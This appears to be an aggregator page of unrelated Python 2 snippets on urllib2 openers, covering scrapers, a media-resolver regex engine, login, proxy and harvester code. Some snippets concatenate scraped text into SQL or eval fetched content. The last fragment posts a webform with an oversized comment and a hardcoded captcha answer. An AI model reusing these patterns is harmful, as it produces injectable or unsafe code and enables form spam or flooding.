                    p = re.sub(r'\r', '', p)
                    p = re.sub(r'\n', '', p)
                    p = re.sub(r'\s', '', p)
                    p = re.sub(r'src=', ' src=', p)

                    #newqiniu = pq(p)
                    #imgs = newqiniu('img')
                    #for image in imgs.items():
                    #imgurl = image('img').attr('src')
                    #newimgurl = qiniuUpdate(imgurl.strip())
                    #p = p.replace(str(imgurl),str(newimgurl))
                    sql = "INSERT INTO 3rd_tencent_news(id,creator,modifier,create_time,modify_time,is_deleted,title,time,img_url,thumbnail_url,source,content,push_flag,recommend_flag,view_status) VALUES(NULL,'sys','sys',now(),now(),'n'," + movie_title.strip(
                    ) + ",now(),'" + imageUrl + "','" + imageUrl + "','1905电影网','" + p.strip(
                    ) + "',0,NULL,0);" + '\n'
                    print sql
                    f1.writelines(sql)
                    file_name = urllib2.unquote(
                        movie_pic.strip()).decode('utf8').split('/')[-1]
                    os.remove('/app/yxtk/script/' + file_name)
            except Exception as e:
                print e
        break
    f1.close()
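The scraper above normalizes each article body with a fixed chain of re.sub() calls; a condensed sketch of that cleanup pass on a made-up HTML fragment:

import re

# Made-up fragment standing in for the 'div.pic-content' HTML pulled above.
p = "<style>.x{color:red}</style><p style='color:red'>Hello <b>world</b><img src='a.jpg'></p>\r\n"

p = re.sub(r'&#13;', '', p)
p = re.sub(r'<style.*>([\S\s\t]*?)</style>', '', p)
p = re.sub(r'<script.*>([\S\s\t]*?)</script>', '', p)
p = re.sub(r'<p[^>]*>', '<p>', p)           # strip attributes from <p>
p = re.sub(r'<(?!img|br|p|/p).*?>', '', p)  # drop every tag except img/br/p
p = re.sub(r'\r', '', p)
p = re.sub(r'\n', '', p)
p = re.sub(r'\s', '', p)
p = re.sub(r'src=', ' src=', p)

print p  # -> <p>Helloworld<img src='a.jpg'></p>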
Ejemplo n.º 48
0
def getRegexParsed(
        regexs,
        url,
        cookieJar=None,
        forCookieJarOnly=False,
        recursiveCall=False,
        cachedPages={},
        rawPost=False,
        cookie_jar_file=None):  #0,1,2 = URL, regexOnly, CookieJarOnly
    #cachedPages = {}
    #print 'url',url
    doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url)
    #        print 'doRegexs',doRegexs,regexs
    setresolved = True
    for k in doRegexs:
        if k in regexs:
            #print 'processing ' ,k
            m = regexs[k]
            #print m
            cookieJarParam = False
            if 'cookiejar' in m:  # so either create or reuse existing jar
                #print 'cookiejar exists',m['cookiejar']
                cookieJarParam = m['cookiejar']
                if '$doregex' in cookieJarParam:
                    cookieJar = getRegexParsed(regexs, m['cookiejar'],
                                               cookieJar, True, True,
                                               cachedPages)
                    cookieJarParam = True
                else:
                    cookieJarParam = True
            #print 'm[cookiejar]',m['cookiejar'],cookieJar
            if cookieJarParam:
                if cookieJar == None:
                    #print 'create cookie jar'
                    cookie_jar_file = None
                    if 'open[' in m['cookiejar']:
                        cookie_jar_file = m['cookiejar'].split(
                            'open[')[1].split(']')[0]
#                            print 'cookieJar from file name',cookie_jar_file

                    cookieJar = getCookieJar(cookie_jar_file)
                    #                        print 'cookieJar from file',cookieJar
                    if cookie_jar_file:
                        saveCookieJar(cookieJar, cookie_jar_file)
                    #import cookielib
                    #cookieJar = cookielib.LWPCookieJar()
                    #print 'cookieJar new',cookieJar
                elif 'save[' in m['cookiejar']:
                    cookie_jar_file = m['cookiejar'].split('save[')[1].split(
                        ']')[0]
                    complete_path = os.path.join(profile, cookie_jar_file)
                    #                        print 'complete_path',complete_path
                    saveCookieJar(cookieJar, cookie_jar_file)

            if m['page'] and '$doregex' in m['page']:
                pg = getRegexParsed(regexs,
                                    m['page'],
                                    cookieJar,
                                    recursiveCall=True,
                                    cachedPages=cachedPages)
                if len(pg) == 0:
                    pg = 'http://regexfailed'
                m['page'] = pg

            if 'setcookie' in m and m['setcookie'] and '$doregex' in m[
                    'setcookie']:
                m['setcookie'] = getRegexParsed(regexs,
                                                m['setcookie'],
                                                cookieJar,
                                                recursiveCall=True,
                                                cachedPages=cachedPages)
            if 'appendcookie' in m and m['appendcookie'] and '$doregex' in m[
                    'appendcookie']:
                m['appendcookie'] = getRegexParsed(regexs,
                                                   m['appendcookie'],
                                                   cookieJar,
                                                   recursiveCall=True,
                                                   cachedPages=cachedPages)

            if 'post' in m and '$doregex' in m['post']:
                m['post'] = getRegexParsed(regexs,
                                           m['post'],
                                           cookieJar,
                                           recursiveCall=True,
                                           cachedPages=cachedPages)
#                    print 'post is now',m['post']

            if 'rawpost' in m and '$doregex' in m['rawpost']:
                m['rawpost'] = getRegexParsed(regexs,
                                              m['rawpost'],
                                              cookieJar,
                                              recursiveCall=True,
                                              cachedPages=cachedPages,
                                              rawPost=True)
                #print 'rawpost is now',m['rawpost']

            if 'rawpost' in m and '$epoctime$' in m['rawpost']:
                m['rawpost'] = m['rawpost'].replace('$epoctime$',
                                                    getEpocTime())

            if 'rawpost' in m and '$epoctime2$' in m['rawpost']:
                m['rawpost'] = m['rawpost'].replace('$epoctime2$',
                                                    getEpocTime2())

            link = ''
            if m['page'] and m[
                    'page'] in cachedPages and not 'ignorecache' in m and forCookieJarOnly == False:
                #print 'using cache page',m['page']
                link = cachedPages[m['page']]
            else:
                if m['page'] and not m['page'] == '' and m['page'].startswith(
                        'http'):
                    if '$epoctime$' in m['page']:
                        m['page'] = m['page'].replace('$epoctime$',
                                                      getEpocTime())
                    if '$epoctime2$' in m['page']:
                        m['page'] = m['page'].replace('$epoctime2$',
                                                      getEpocTime2())

                    #print 'Ingoring Cache',m['page']
                    page_split = m['page'].split('|')
                    pageUrl = page_split[0]
                    header_in_page = None
                    if len(page_split) > 1:
                        header_in_page = page_split[1]

#                            if
#                            proxy = urllib2.ProxyHandler({ ('https' ? proxytouse[:5]=="https":"http") : proxytouse})
#                            opener = urllib2.build_opener(proxy)
#                            urllib2.install_opener(opener)

#                        import urllib2
#                        print 'urllib2.getproxies',urllib2.getproxies()
                    current_proxies = urllib2.ProxyHandler(
                        urllib2.getproxies())

                    #print 'getting pageUrl',pageUrl
                    req = urllib2.Request(pageUrl)
                    if 'proxy' in m:
                        proxytouse = m['proxy']
                        #                            print 'proxytouse',proxytouse
                        #                            urllib2.getproxies= lambda: {}
                        if pageUrl[:5] == "https":
                            proxy = urllib2.ProxyHandler({'https': proxytouse})
                            #req.set_proxy(proxytouse, 'https')
                        else:
                            proxy = urllib2.ProxyHandler({'http': proxytouse})
                            #req.set_proxy(proxytouse, 'http')
                        opener = urllib2.build_opener(proxy)
                        urllib2.install_opener(opener)

                    req.add_header(
                        'User-Agent',
                        'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1'
                    )
                    proxytouse = None

                    if 'referer' in m:
                        req.add_header('Referer', m['referer'])
                    if 'accept' in m:
                        req.add_header('Accept', m['accept'])
                    if 'agent' in m:
                        req.add_header('User-agent', m['agent'])
                    if 'x-req' in m:
                        req.add_header('X-Requested-With', m['x-req'])
                    if 'x-addr' in m:
                        req.add_header('x-addr', m['x-addr'])
                    if 'x-forward' in m:
                        req.add_header('X-Forwarded-For', m['x-forward'])
                    if 'setcookie' in m:
                        #                            print 'adding cookie',m['setcookie']
                        req.add_header('Cookie', m['setcookie'])
                    if 'appendcookie' in m:
                        #                            print 'appending cookie to cookiejar',m['appendcookie']
                        cookiestoApend = m['appendcookie']
                        cookiestoApend = cookiestoApend.split(';')
                        for h in cookiestoApend:
                            n, v = h.split('=')
                            w, n = n.split(':')
                            ck = cookielib.Cookie(version=0,
                                                  name=n,
                                                  value=v,
                                                  port=None,
                                                  port_specified=False,
                                                  domain=w,
                                                  domain_specified=False,
                                                  domain_initial_dot=False,
                                                  path='/',
                                                  path_specified=True,
                                                  secure=False,
                                                  expires=None,
                                                  discard=True,
                                                  comment=None,
                                                  comment_url=None,
                                                  rest={'HttpOnly': None},
                                                  rfc2109=False)
                            cookieJar.set_cookie(ck)
                    if 'origin' in m:
                        req.add_header('Origin', m['origin'])
                    if header_in_page:
                        header_in_page = header_in_page.split('&')
                        for h in header_in_page:
                            n, v = h.split('=')
                            req.add_header(n, v)

                    if not cookieJar == None:
                        #                            print 'cookieJarVal',cookieJar
                        cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
                        opener = urllib2.build_opener(
                            cookie_handler, urllib2.HTTPBasicAuthHandler(),
                            urllib2.HTTPHandler())
                        urllib2.install_opener(opener)
                        #                            print 'noredirect','noredirect' in m

                        if 'noredirect' in m:
                            opener = urllib2.build_opener(
                                cookie_handler, NoRedirection,
                                urllib2.HTTPBasicAuthHandler(),
                                urllib2.HTTPHandler())
                            urllib2.install_opener(opener)
                    elif 'noredirect' in m:
                        opener = urllib2.build_opener(
                            NoRedirection, urllib2.HTTPBasicAuthHandler(),
                            urllib2.HTTPHandler())
                        urllib2.install_opener(opener)

                    if 'connection' in m:
                        #                            print '..........................connection//////.',m['connection']
                        from keepalive import HTTPHandler
                        keepalive_handler = HTTPHandler()
                        opener = urllib2.build_opener(keepalive_handler)
                        urllib2.install_opener(opener)

                    #print 'after cookie jar'
                    post = None

                    if 'post' in m:
                        postData = m['post']
                        #if '$LiveStreamRecaptcha' in postData:
                        #    (captcha_challenge,catpcha_word,idfield)=processRecaptcha(m['page'],cookieJar)
                        #    if captcha_challenge:
                        #        postData=postData.replace('$LiveStreamRecaptcha','manual_recaptcha_challenge_field:'+captcha_challenge+',recaptcha_response_field:'+catpcha_word+',id:'+idfield)
                        splitpost = postData.split(',')
                        post = {}
                        for p in splitpost:
                            n = p.split(':')[0]
                            v = p.split(':')[1]
                            post[n] = v
                        post = urllib.urlencode(post)

                    if 'rawpost' in m:
                        post = m['rawpost']
                        #if '$LiveStreamRecaptcha' in post:
                        #    (captcha_challenge,catpcha_word,idfield)=processRecaptcha(m['page'],cookieJar)
                        #    if captcha_challenge:
                        #       post=post.replace('$LiveStreamRecaptcha','&manual_recaptcha_challenge_field='+captcha_challenge+'&recaptcha_response_field='+catpcha_word+'&id='+idfield)
                    link = ''
                    try:

                        if post:
                            response = urllib2.urlopen(req, post)
                        else:
                            response = urllib2.urlopen(req)
                        if response.info().get('Content-Encoding') == 'gzip':
                            from StringIO import StringIO
                            import gzip
                            buf = StringIO(response.read())
                            f = gzip.GzipFile(fileobj=buf)
                            link = f.read()
                        else:
                            link = response.read()

                        if 'proxy' in m and not current_proxies is None:
                            urllib2.install_opener(
                                urllib2.build_opener(current_proxies))

                        link = javascriptUnEscape(link)
                        #print repr(link)
                        #print link  # would dump the whole webpage into the log
                        if 'includeheaders' in m:
                            #link+=str(response.headers.get('Set-Cookie'))
                            link += '$$HEADERS_START$$:'
                            for b in response.headers:
                                link += b + ':' + response.headers.get(
                                    b) + '\n'
                            link += '$$HEADERS_END$$:'

#                        print link

                        response.close()
                    except:
                        pass
                    cachedPages[m['page']] = link
                    #print link
                    #print 'store link for',m['page'],forCookieJarOnly

                    if forCookieJarOnly:
                        return cookieJar  # do nothing
                elif m['page'] and not m['page'].startswith('http'):
                    if m['page'].startswith('$pyFunction:'):
                        val = doEval(m['page'].split('$pyFunction:')[1], '',
                                     cookieJar, m)
                        if forCookieJarOnly:
                            return cookieJar  # do nothing
                        link = val
                        link = javascriptUnEscape(link)
                    else:
                        link = m['page']

            if '$doregex' in m['expres']:
                m['expres'] = getRegexParsed(regexs,
                                             m['expres'],
                                             cookieJar,
                                             recursiveCall=True,
                                             cachedPages=cachedPages)

            if not m['expres'] == '':
                #print 'doing it ',m['expres']
                if '$LiveStreamCaptcha' in m['expres']:
                    val = askCaptcha(m, link, cookieJar)
                    #print 'url and val',url,val
                    url = url.replace("$doregex[" + k + "]", val)

                elif m['expres'].startswith(
                        '$pyFunction:') or '#$pyFunction' in m['expres']:
                    #print 'expeeeeeeeeeeeeeeeeeee',m['expres']
                    val = ''
                    if m['expres'].startswith('$pyFunction:'):
                        val = doEval(m['expres'].split('$pyFunction:')[1],
                                     link, cookieJar, m)
                    else:
                        val = doEvalFunction(m['expres'], link, cookieJar, m)
                    if 'ActivateWindow' in m['expres']: return
                    if forCookieJarOnly:
                        return cookieJar  # do nothing
                    if 'listrepeat' in m:
                        listrepeat = m['listrepeat']
                        return listrepeat, eval(val), m, regexs, cookieJar

                    try:
                        url = url.replace(u"$doregex[" + k + "]", val)
                    except:
                        url = url.replace("$doregex[" + k + "]",
                                          val.decode("utf-8"))
                else:
                    if 'listrepeat' in m:
                        listrepeat = m['listrepeat']
                        ret = re.findall(m['expres'], link)
                        return listrepeat, ret, m, regexs

                    val = ''
                    if not link == '':
                        #print 'link',link
                        reg = re.compile(m['expres']).search(link)
                        try:
                            val = reg.group(1).strip()
                        except:
                            traceback.print_exc()
                    elif m['page'] == '' or m['page'] == None:
                        val = m['expres']

                    if rawPost:
                        #                            print 'rawpost'
                        val = urllib.quote_plus(val)
                    if 'htmlunescape' in m:
                        #val=urllib.unquote_plus(val)
                        import HTMLParser
                        val = HTMLParser.HTMLParser().unescape(val)
                    try:
                        url = url.replace("$doregex[" + k + "]", val)
                    except:
                        url = url.replace("$doregex[" + k + "]",
                                          val.decode("utf-8"))
                    #print 'ur',url
                    #return val
            else:
                url = url.replace("$doregex[" + k + "]", '')
    if '$epoctime$' in url:
        url = url.replace('$epoctime$', getEpocTime())
    if '$epoctime2$' in url:
        url = url.replace('$epoctime2$', getEpocTime2())

    if '$GUID$' in url:
        import uuid
        url = url.replace('$GUID$', str(uuid.uuid1()).upper())
    if '$get_cookies$' in url:
        url = url.replace('$get_cookies$', getCookiesString(cookieJar))

    if recursiveCall: return url
    #print 'final url',repr(url)
    if url == "":
        return
    else:
        return url, setresolved
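
In short, getRegexParsed() replaces every $doregex[name] token in url with group(1) of the named entry's regex, applied to the page that entry fetches (with optional cookies, headers and POST data). A minimal illustration of the expected regexs shape and call; the page URL and pattern are made-up placeholders:

regexs = {
    'vid': {
        'page': 'http://example.com/watch/123',  # placeholder page to fetch
        'expres': r'file:\s*"([^"]+)"',          # group(1) becomes the substituted value
    }
}
# The $doregex[vid] token below is replaced by whatever group(1) matched on the page.
resolved_url, setresolved = getRegexParsed(regexs, 'plugin://play/?url=$doregex[vid]')
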
Ejemplo n.º 49
0
 def __init__(self):
     # save cookies
     self.cj = cookielib.LWPCookieJar()
     cookie_support = urllib2.HTTPCookieProcessor(self.cj)
     opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)
     urllib2.install_opener(opener)
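
Once a cookie-aware opener is installed like this, every later urllib2.urlopen call in the process shares the same jar, so a login request followed by a data request keeps its session. A small sketch (the URLs are placeholders):

import cookielib
import urllib2

cj = cookielib.LWPCookieJar()
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)))

urllib2.urlopen('http://example.com/login')  # response cookies land in cj
urllib2.urlopen('http://example.com/data')   # and are sent back automatically
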
Ejemplo n.º 50
0
def open_packet_log():
    httpHandler = urllib2.HTTPHandler(debuglevel=1)
    httpsHandler = urllib2.HTTPSHandler(debuglevel=1)
    opener = urllib2.build_opener(httpHandler, httpsHandler)
    urllib2.install_opener(opener)
    pass
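
A quick usage sketch (placeholder URL): with the debuglevel=1 handlers installed, every subsequent urllib2 request echoes its raw request and response headers to stdout, which is what makes this a cheap "packet log".

open_packet_log()
urllib2.urlopen('http://example.com/')  # request/response headers are printed to stdout
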
Ejemplo n.º 51
0
def start(args):
    """Login and session handler
    """
    # create cookiejar
    args._cj = LWPCookieJar()

    # lets urllib handle cookies
    opener = build_opener(HTTPCookieProcessor(args._cj))
    opener.addheaders = [("User-Agent",      "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"),
                         ("Accept-Encoding", "identity"),
                         ("Accept",          "*/*"),
                         ("Content-Type",    "application/x-www-form-urlencoded")]
    install_opener(opener)

    # load cookies
    try:
        args._cj.load(getCookiePath(args), ignore_discard=True)
    except IOError:
        # cookie file does not exist
        pass

    # get login informations
    username = args._addon.getSetting("crunchyroll_username")
    password = args._addon.getSetting("crunchyroll_password")

    # session management
    if not (args._session_id and args._auth_token):
        # create new session
        payload = {"device_id":    args._device_id,
                   "device_type":  API.DEVICE,
                   "access_token": API.TOKEN}
        req = request(args, "start_session", payload, True)

        # check for error
        if req["error"]:
            return False
        args._session_id = req["data"]["session_id"]

        # make login
        payload = {"password": password,
                   "account":  username}
        req = request(args, "login", payload, True)

        # check for error
        if req["error"]:
            return False
        args._auth_token = req["data"]["auth"]
    if getattr(args, "_session_restart", False):
        # restart session
        payload = {"device_id":    args._device_id,
                   "device_type":  API.DEVICE,
                   "access_token": API.TOKEN,
                   "auth":         args._auth_token}
        req = request(args, "start_session", payload, True)

        # check for error
        if req["error"]:
            destroy(args)
            return False
        args._session_id = req["data"]["session_id"]
        args._auth_token = req["data"]["auth"]
        args._session_restart = False

    return True
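
start() loads cookies from disk but the snippet never writes them back; a matching save step, reusing the jar and the same getCookiePath() helper the loader uses, would presumably look like this (a sketch, not part of the original add-on):

def save_session(args):
    # Persist the jar filled in start(); ignore_discard also keeps session cookies.
    args._cj.save(getCookiePath(args), ignore_discard=True)
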
Ejemplo n.º 52
0
def fetch_shims():
    """ Download shim files from remote server """
    import urllib2
    attempts = 0
    shims = iter((
        "operaextensions_background.js",
        "operaextensions_popup.js",
        "operaextensions_injectedscript.js",
    ))
    shim_dir = os.path.join(shim_fs_path, shim_dirname)
    shim = next(shims)
    url = shim_fetch_from + shim
    while attempts < 10:
        attempts += 1
        try:
            res = urllib2.urlopen(url)
            if res.code == 200:
                try:
                    if not os.path.exists(shim_dir):
                        os.mkdir(shim_dir)
                    if os.path.isdir(shim_dir):
                        fh = open(os.path.join(shim_dir, shim), 'w')
                        fh.write(res.read())
                        fh.close()
                except Exception as e:
                    sys.exit("ERROR: Unable to fetch shim files from " + url +
                             "\nException was :" + str(e))
            else:
                if debug:
                    print(('Response:', res.code))
            try:
                shim = next(shims)
            except StopIteration:
                break
            url = shim_fetch_from + shim
        except urllib2.HTTPError as ex:
            if ex.code == 401:
                if debug:
                    print(('HTTP Authentication required:', ex.code, ex.msg,
                           ex.hdrs))
                auth_type = ex.hdrs["WWW-Authenticate"].split()[0]
                realm = ex.hdrs["WWW-Authenticate"].split('=')[1]
                realm = realm.strip('"')
                if auth_type == "Basic":
                    auth_handler = urllib2.HTTPBasicAuthHandler()
                    print("Basic auth: Realm: ", realm)
                    print("Enter username:"******"\n")
                    print("Enter password:"******"\n")
                    auth_handler.add_password(realm=realm,
                                              uri=shim_fetch_from,
                                              user=usr,
                                              passwd=pwd)
                    opener = urllib2.build_opener(auth_handler)
                    urllib2.install_opener(opener)
                    continue
            else:
                print(('Threw :', ex, ' when fetching ', url))
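
fetch_shims() relies on several module-level names (shim_fetch_from, shim_fs_path, shim_dirname, debug) that are defined elsewhere in the build script; hypothetical placeholders like these would make the snippet self-contained:

import os

# Hypothetical values only; the real ones come from the surrounding build script.
shim_fetch_from = 'http://example.com/shims/'  # base URL the shim files are pulled from
shim_fs_path = os.getcwd()                     # parent directory for the shim folder
shim_dirname = 'oex_shim'                      # name of the folder to create
debug = False                                  # toggles the extra print output
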
Ejemplo n.º 53
0
def set_proxy():
        proxy = urllib2.ProxyHandler({'http':'wwwcache.open.ac.uk:80', 'https': 'wwwcache.open.ac.uk:80'})
        opener = urllib2.build_opener(proxy)
        urllib2.install_opener(opener)
Ejemplo n.º 54
0
    def send(self, method="GET", path=None, args=None, data=None, auth=False):
        """
            Send a request to the Wrike API

            @param method: the HTTP method
            @param path: the path relative to the repository URL
            @param data: the data to send
            @param auth: this is an authorization request
        """

        repository = self.repository

        # Request URL
        api = "oauth2/token" if auth else "api/v3"
        url = "/".join((repository.url.rstrip("/"), api))
        if path:
            url = "/".join((url, path.lstrip("/")))
        if args:
            url = "?".join((url, urllib.urlencode(args)))

        # Create the request
        req = urllib2.Request(url=url)
        handlers = []

        if not auth:
            # Install access token header
            access_token = self.access_token
            if not access_token:
                message = "Authorization failed: no access token"
                current.log.error(message)
                return None, message
            req.add_header("Authorization", "%s %s" %
                                            (self.token_type, access_token))
            # JSONify request data
            request_data = json.dumps(data) if data else ""
            if request_data:
                req.add_header("Content-Type", "application/json")
        else:
            # URL-encode request data for auth
            request_data = urllib.urlencode(data) if data else ""

        # Indicate that we expect JSON response
        req.add_header("Accept", "application/json")

        # Proxy handling
        config = repository.config
        proxy = repository.proxy or config.proxy or None
        if proxy:
            current.log.debug("using proxy=%s" % proxy)
            proxy_handler = urllib2.ProxyHandler({"https": proxy})
            handlers.append(proxy_handler)

        # Install all handlers
        if handlers:
            opener = urllib2.build_opener(*handlers)
            urllib2.install_opener(opener)

        # Execute the request
        response = None
        message = None
        try:
            if method == "POST":
                f = urllib2.urlopen(req, data=request_data)
            else:
                f = urllib2.urlopen(req)
        except urllib2.HTTPError, e:
            message = "HTTP %s: %s" % (e.code, e.reason)
Ejemplo n.º 55
0
  if options.username:
    usr=options.username
    if options.password:
      pw=options.password
    else:
      try:
        pw=os.environ['ICO_PW']
      except:
        print("Please specify your ICO password")
        pw=raw_input()
    password_manager.add_password(None, options.url, usr, pw)

  auth = urllib2.HTTPBasicAuthHandler(password_manager) # create an authentication handler
  opener = urllib2.build_opener(auth) # create an opener with the authentication handler
  urllib2.install_opener(opener) # install the opener...


  action=options.action.lower()[0]
  ICOType=options.itemtype.lower()[0]

  if ICOType == 'c':
    if action == 'l':
      url="{0}/orchestrator/v2/categories?_limit={1}".format(options.url, options.list_limit)
      request = urllib2.Request(url)
      handler = urllib2.urlopen(request)
      j=json.loads(handler.read())
      if options.debug:
        print(formatted(j))
      cats={}
      for cat in j['items']:
Ejemplo n.º 56
0
def setup_cookie():
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)
def main():
    # Connection variables
    csw_url = 'csw.open.canada.ca/geonetwork/srv/csw'
    csw_user = None
    csw_passwd = None

    proxy_protocol = None
    proxy_url = None
    proxy_user = None
    proxy_passwd = None
    records_per_request = 10

    # Or read from a .ini file
    harvester_file = 'config/harvester.ini'
    if os.path.isfile(harvester_file):
        from ConfigParser import ConfigParser

        ini_config = ConfigParser()

        ini_config.read(harvester_file)

        csw_url = ini_config.get('csw', 'url')

        # Get configuration options
        if ini_config.has_option('csw', 'username'):
            csw_user = ini_config.get('csw', 'username')

            csw_passwd = ini_config.get('csw', 'password')

        if ini_config.has_option('proxy', 'protocol'):
            proxy_protocol = ini_config.get('proxy', 'protocol')

        if ini_config.has_option('proxy', 'url'):
            proxy_url = ini_config.get('proxy', 'url')

        if ini_config.has_option('proxy', 'username'):
            proxy_user = ini_config.get('proxy', 'username')
            proxy_passwd = ini_config.get('proxy', 'password')

        if ini_config.has_option('processing', 'records_per_request'):
            records_per_request = int(
                ini_config.get('processing', 'records_per_request'))

        if ini_config.has_option('processing', 'start_date'):
            start_date = ini_config.get('processing', 'start_date')

    # If you're supplying a proxy
    if proxy_url:
        # And you're using authentication
        if proxy_user and proxy_passwd:
            password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
            password_mgr.add_password(None, proxy_url, proxy_user,
                                      proxy_passwd)
            proxy_auth_handler = urllib2.ProxyBasicAuthHandler(password_mgr)
        # or even if you're not
        else:
            proxy_auth_handler = urllib2.ProxyHandler(
                {proxy_protocol: proxy_url})

        opener = urllib2.build_opener(proxy_auth_handler)
        urllib2.install_opener(opener)

    # Fetch the data
    # csw = CatalogueServiceWeb(
    #   'https://*****:*****@csw_url/geonetwork/srv/csw')
    if csw_user and csw_passwd:
        csw = CatalogueServiceWeb('https://' + csw_url,
                                  username=csw_user,
                                  password=csw_passwd,
                                  timeout=20)
    else:
        csw = CatalogueServiceWeb('https://' + csw_url,
                                  timeout=20,
                                  skip_caps=True)

    request_template = """<?xml version="1.0"?>
<csw:GetRecords
    xmlns:csw="http://www.opengis.net/cat/csw/2.0.2"
    service="CSW"
    version="2.0.2"
    resultType="results"
    outputSchema="csw:IsoRecord"
    maxRecords="%d"
    startPosition="%d"
>
    <csw:Query
        typeNames="gmd:MD_Metadata">
        <csw:ElementSetName>full</csw:ElementSetName>
        <csw:Constraint
            version="1.1.0">
            <Filter
                xmlns="http://www.opengis.net/ogc"
                xmlns:gml="http://www.opengis.net/gml">
                <PropertyIsGreaterThanOrEqualTo>
                    <PropertyName>Modified</PropertyName>
                    <Literal>%s</Literal>
                </PropertyIsGreaterThanOrEqualTo>
            </Filter>
        </csw:Constraint>
    </csw:Query>
</csw:GetRecords>
"""

    # Is there a specified start date
    if arguments['-f']:
        start_date = arguments['-f']

    active_page = 0
    next_record = 1
    request_another = True

    while request_another:

        request_another = False

        # Filter records into latest updates
        #
        # Sorry Tom K., we'll be more modern ASAWC.
        # For now it's good ol' Kitchen Sink
        #
        # from owslib.fes import PropertyIsGreaterThanOrEqualTo
        # modified = PropertyIsGreaterThanOrEqualTo(
        #   'apiso:Modified',
        #   '2015-04-04'
        # )
        # csw.getrecords2(constraints=[modified])
        #
        # Kitchen Sink is the valid HNAP, we need HNAP for R1 to debug issues
        # This filter was supplied by EC, the CSW service technical lead
        current_request = request_template % (records_per_request, next_record,
                                              start_date)

        # (active_page*records_per_request)+1
        csw.getrecords2(format='xml', xml=current_request)
        active_page += 1

        # Identify if we need to continue this.
        records_root = ("/csw:GetRecordsResponse")

        # Read the file, should be a streamed input in the future
        root = etree.XML(csw.response)
        # Parse the root and iterate over each record
        records = fetchXMLArray(root, records_root)

        timestamp = fetchXMLAttribute(records[0], "csw:SearchStatus",
                                      "timestamp")[0]
        number_of_records_matched = int(
            fetchXMLAttribute(records[0], "csw:SearchResults",
                              "numberOfRecordsMatched")[0])
        number_of_records_returned = int(
            fetchXMLAttribute(records[0], "csw:SearchResults",
                              "numberOfRecordsReturned")[0])
        next_record = int(
            fetchXMLAttribute(records[0], "csw:SearchResults",
                              "nextRecord")[0])

        if next_record <= number_of_records_matched and next_record != 0:
            request_another = True

        # When we move to Tom K's filter we can use results in an R2 unified
        # harvester
        # print csw.results
        # for rec in csw.records:
        #    print '* '+csw.records[rec].title
        # Till then we need to collect and dump the response from the CSW

        # No use minimizing the XML to try to create a XML Lines file as the
        # data has carriage returns.
        # parser = etree.XMLParser(remove_blank_text=True)
        # elem = etree.XML(csw.response, parser=parser)
        # print etree.tostring(elem)

        # Output the harvested page
        print csw.response
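
main() only overrides its defaults when config/harvester.ini exists; a minimal file matching the sections and options it reads (all values below are placeholders) could look like:

[csw]
url = csw.open.canada.ca/geonetwork/srv/csw
username = harvest_user
password = harvest_pass

[proxy]
protocol = http
url = proxy.example.org:3128
username = proxy_user
password = proxy_pass

[processing]
records_per_request = 10
start_date = 2015-01-01
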
Ejemplo n.º 58
0
def install_proxy(proxy):
    print proxy
    opener = urllib2.build_opener(urllib2.ProxyHandler({'http': proxy}),
                                  urllib2.HTTPHandler(debuglevel=1))
    urllib2.install_opener(opener)
    print('Install Proxy Done')
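
A usage sketch (the proxy address is a placeholder): once installed, every later urllib2 call is routed through the proxy, and debuglevel=1 echoes the HTTP traffic.

install_proxy('127.0.0.1:8080')
urllib2.urlopen('http://example.com/')  # goes through the proxy, with debug output
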
Ejemplo n.º 59
0
def book_spider(book_tag):
    page_num = 0
    book_list = []
    try_times = 0

    while (1):
        url = 'http://www.douban.com/tag/' + urllib.quote(
            book_tag) + '/book?start=' + str(page_num * 15)
        time.sleep(np.random.rand() * 5)

        try:
            random_proxy = random.choice(proxys)
            proxy_support = urllib2.ProxyHandler({"http": random_proxy})
            opener = urllib2.build_opener(proxy_support)
            urllib2.install_opener(opener)
            plain_text = urllib2.urlopen(url)
        except (urllib2.HTTPError, urllib2.URLError), e:
            print e
            continue

        #try:
        #req = urllib2.Request(url,headers = hds[page_num%len(hds)])
        #source_code = urllib2.urlopen(req).read()
        #plain_text = str(source_code)
        #except(urllib2.HTTPError,urllib2.URLError),e:
        #print e
        #continue

        soup = BeautifulSoup(plain_text)
        list_soup = soup.find('div', {'class': 'mod book-list'})

        try_times += 1
        if list_soup == None and try_times < 10:
            continue
        elif list_soup == None or len(list_soup) < 1:
            break

        for book_info in list_soup.findAll('dd'):
            title = book_info.find('a', {'class': 'title'}).string.strip()
            desc = book_info.find('div', {'class': 'desc'}).string.strip()
            desc_list = desc.split('/')
            book_url = book_info.find('a', {'class': 'title'}).get('href')

            try:
                author_info = '作者/译者:' + '/'.join(desc_list[0:-3])
            except:
                author_info = '作者/译者:暂无'

            try:
                pub_info = "出版信息:" + "/".join(desc_list[-3:])
            except:
                pub_info = '出版信息:暂无'

            try:
                rating = book_info.find('span', {
                    'class': 'rating_num'
                }).string.strip()
            except:
                rating = '0.0'

            try:
                people_num = get_people_num(book_url)
                people_num = people_num.strip('人物评价')
            except:
                people_num = '0'

            book_list.append(
                [title, rating, people_num, author_info, pub_info])
            try_times = 0
        page_num += 1
        print 'Downloading Information From Page %d' % page_num
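
book_spider() assumes a proxys list and a get_people_num() helper defined elsewhere; a minimal, hypothetical version of the helper (the markup pattern is a guess, not taken from the snippet) might be:

import re
import urllib2

def get_people_num(book_url):
    # Hypothetical helper: fetch the book page and pull the rating count.
    # The regex below is an assumption about the page markup.
    page = urllib2.urlopen(book_url).read()
    match = re.search(r'property="v:votes">(\d+)<', page)
    return match.group(1) if match else '0'
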
Ejemplo n.º 60
0
"submitted[email_address]" : "*****@*****.**",
"submitted[phone_number]" : "*****@*****.**",
"submitted[comment]" : big,
"details[sid]" : '',
"details[page_num]" : 1,
"details[page_count]" : 1,
"details[finished]" :  0,
"form_build_id" : "form-Wh5QUVUNov9DMh-a57x0lfeB5mKYJeuiAYDZrlO1yh4",
"form_id" : "webform_client_form_1",
"captcha_sid": 421933,
"captcha_token" : "cd93ba2b98de546c744526b83fd8b3e5",
"captcha_response" : "Zh9CR",
